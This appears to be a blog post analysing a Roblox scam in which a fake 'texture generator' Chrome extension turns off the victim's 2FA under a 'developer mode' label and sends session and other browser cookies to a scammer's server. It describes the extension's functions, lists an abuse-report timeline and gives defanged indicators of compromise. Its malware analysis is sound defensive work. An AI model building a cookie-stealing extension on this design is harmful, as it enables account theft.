Scam Overview
Written February 2024
For the uninitiated, Roblox is a popular video game these days. In fact, in August 2020, Roblox had over 164 million monthly active users, including more than half of all American children under 16. (This young-person user base happens to include a teenager in my family too, which is why you’re finding me writing about a Roblox scam today.)
With such popularity, scams have long existed in the Roblox community centered around stealing a user’s .ROBLOSECURITY session cookie, because stealing this cookie allows a scammer to login to the victim’s Roblox account, bypassing any 2FA/MFA. Ultimately, the scammer is looking to steal the victim’s Roblox account, even if only temporarily, to gain their valuable items and in-game currency, called Robux. The end goal with stealing these in-game items is to convert them to real cash or cryptocurrency. For those interested in more backstory, a detailed writeup from Vice on Roblox scammers, called “beamers”, and the Roblox black market can be found here.
The scam analyzed in this article is a variation that uses Discord to connect the scammer with Roblox users (victims) and, after some social engineering, getting the victim to install a malicious Google Chrome extension that will send the .ROBLOSECURITY cookie to the scammer.
Scam Analysis
Part 1 – The Scammer Identifies Their Victim
The scammer begins the scam by identifying victims in the Roblox game itself whose characters have rare and valuable items. For example, if the scammer sees a character wearing “Poisoned Horns of the Toxic Wasteland”, this will immediately catch their eye as these limited edition horns are worth 599k Robux. If you were to purchase enough Robux with USD through the game’s legitimate marketplace, this would cost over $5000!
Part 2 – The Scammer Performs Social Engineering
After identifying their victim, the scammer messages them using in-game chat and claims they want to make artwork, i.e. a rendering, of the victim’s character since their appearance is so cool. The scammer then encourages the victim to connect with them on Discord so they can send photos of the artwork, which is not possible through the in-game chat (and also decouples the scammer’s in-game Roblox account with the non-monitored Discord account.)
Through Discord, the scammer sends 3D artwork of the victim’s character pulled from the victim’s in-game character model. However, the artwork sent over has no color – it just appears as a solid grey figurine.
As part of the ruse, the scammer tells the victim that they aren’t able to add the “textures” to their artwork without some help, and the victim will need to navigate to rendercraft[.]eu to download a “texture generator” plugin – plugin here, as we will find out, means a Google Chrome extension.
On first glance, the scammer’s website looks legitimate, but searching the company Render Craft does turn up a different hostname, rendercraft.com. Our first red flag during analysis is the real Render Craft, rendercraft.com, has had their domain registered since 2008, while rendercraft[.]eu is newly registered as of January 2024. A newly registered domain is suspicious, and it is very likely that the scammer is impersonating the real Render Craft with a website clone.
Back to the website, the plugin download button is front and center. However, as a careful observer will notice, the download link is a random Google Drive link, not a file hosted on the website itself. The also means the victim will need to be logged in to a Google account to download the Chrome extension.
Part 3 – The Victim Installs The Malicious Chrome Extension
The Google Drive link downloads RenderCraftTextureGenerator.zip to the victim’s computer. This Google Chrome extension is not in the Chrome Web Store and has to be loaded into Chrome manually in developer mode – another big red flag. “Luckily” for the victim, a video tutorial on how to install the plugin is located on the scammer’s website.
Part 4 – The Beginning of the Heist
Once the extension has been installed, the victim first interacts with the extension to “Enable Dev Mode.” This looks harmless at first glance, but Roblox actually doesn’t have a developer mode.
Additionally, you can’t enable this “developer mode” without inputting your 2FA/MFA code or password. What is going on here?! Before we continue looking at the scammer’s heist from the victim’s perspective, let’s start analyzing the code to see what is happening at this moment.
Unpacking the extension’s .zip file reveals a few files of interest: manifest.json, popup.html, and, in the scripts folder, popup.js, content.js, and background.js.
The manifest file is required for Chrome extensions and lists important information about the structure and behavior of the extension. Among other things, we can see at a glance this extension:
- Has “permissions” to access “cookies”
- Uses popup.html to control what displays when the user clicks on the extension (the “browser_action” section)
- Will run a content script, content.js, for any Roblox URL we have open in Chrome, allowing it to read the contents of those pages and make changes to them (the “content_scripts” section)
- Will run our background script, background.js, to manage events seen by the extension (the “background” section)
Starting with popup.html, it looks pretty straightforward – for example, some simple HTML to create a button labeled “Enable Dev Mode” that we saw moments ago. We see the JavaScript file popup.js is loaded as well via the <script> tag.
Upon attempting to analyze/reverse engineer popup.js (and all the other JavaScript files), we find a third (at minimum) red flag here as the code has been obfuscated.
After a little research, I found that the code was obfuscated using obfuscator.io, and, conveniently, there is a web-based deobfuscator for us at webcrack.netlify.app. This reversing of the obfuscation is necessary so we can read the code and perform our analysis.
Ah ha! Popup.js shows us what happens when we click “Enable Dev Mode” – it opens the Roblox Account Security page.
Not only that, after the browser navigates to the Account Security page, content.js changes the content on that page. First, it hides some content completely that we would expect to see on that page, such as what devices are currently logged in to this Roblox account. At the same time, it modifies the 2FA security toggle to be the “developer mode” toggle. This means that the victim thinks they are enabling a secret developer mode, but in reality they are disabling their account’s 2FA!
Part 5 – The Heist Continues
Back to the victim’s perspective, after enabling developer mode, the Chrome extension pop up now prompts them to generate textures – the reason we have done all this work for the scammer in the first place. However, the extension says it is working on generating those textures for us, but nothing is happening. Did we do it wrong?
Let’s jump into the background.js file to see the final pieces to this heist.
Background.js is rather short compared to content.js, but it turns out you can still have one heck of a grand finale even without a lot of code.
The function checkForCookieAndSend() searches specifically for the .ROBLOSECURITY cookie we talked about in the Scam Overview, and then uses function fetchUserInfoAndSend() to send to this cookie to the scammer’s backend data collection server, which we will look at more closely momentarily.
There’s also a function called grabNonRobloxCookiesAndSendToBackend() which grabs ALL other cookies in Chrome and calls sendToBackend() to send the cookies to their backend server. This is especially scary as the malicious extension could compromise victim accounts beyond just a Roblox account. It’s worth noting again that before downloading the extension from Google Drive in the first place, the victim had to be signed in to Google, so we can expect stealing this Google login cookie will take place.
The backend server they setup is located at rendercraft-backend[.]org and is configured to receive the data via HTTP POST requests at various URLs. This sendToBackend() function in particular is sending to /sendallcookies in JSON format.
Finally, there is sending of some of the victim’s data, like the user ID, via Discord webhook. There are no connections to Discord URLs directly, but assuming the function name is true, it uses their backend server URL /sendkey as a middleman to perform this action.
Actions Taken & Timeline
- Jan 13th – Family member gets scammed
- Jan 14th – Reported abuse for render-craft[.]org and rendercraft-backend[.]org to registrar and webhost
- Jan 15th – Registrar suspends render-craft[.]org
- Jan 27th – Discovery of new domains operating this scam – rendercraft[.]eu and rendercraft-backend[.]online
- Jan 27th – Reported abuse for rendercraft[.]eu to webhost and rendercraft-backend[.]online to registrar
- Jan 29th – rendercraft-backend[.]org is suspended by the registrar
- Jan 31st – rendercraft-backend[.]online is suspended by the registrar
- Feb 2nd – rendercraft[.]eu is suspended by the webhost
IOCs
Hostnames & URLs
rendercraft[.]eu
render-craft[.]org
rendercraft-backend[.]org
rendercraft-backend[.]online
https://drive[.]google[.]com/uc?export=download&id=1eCwas4kwTDQjomZHT3vv355Ft-Faezta
https://drive[.]google[.]com/uc?export=download&id=1hKHzi0595oxETSL68zfMxZsoRFWkDlj0
IPs
191[.]101[.]104[.]245
191[.]101[.]104[.]152
191[.]96[.]144[.]129
216[.]24[.]57[.]1
File Hashes
Chrome Extension RenderCraftTextureGenerator.zip
27e15e4d4e59e57cc04f6bb36da012fd511052a26c323ccdca69faf4ffc4ea0a
f65a4f2bed5ffef1a4f9b5255c1ed75caa31a02cae30e9c75d861efa97778472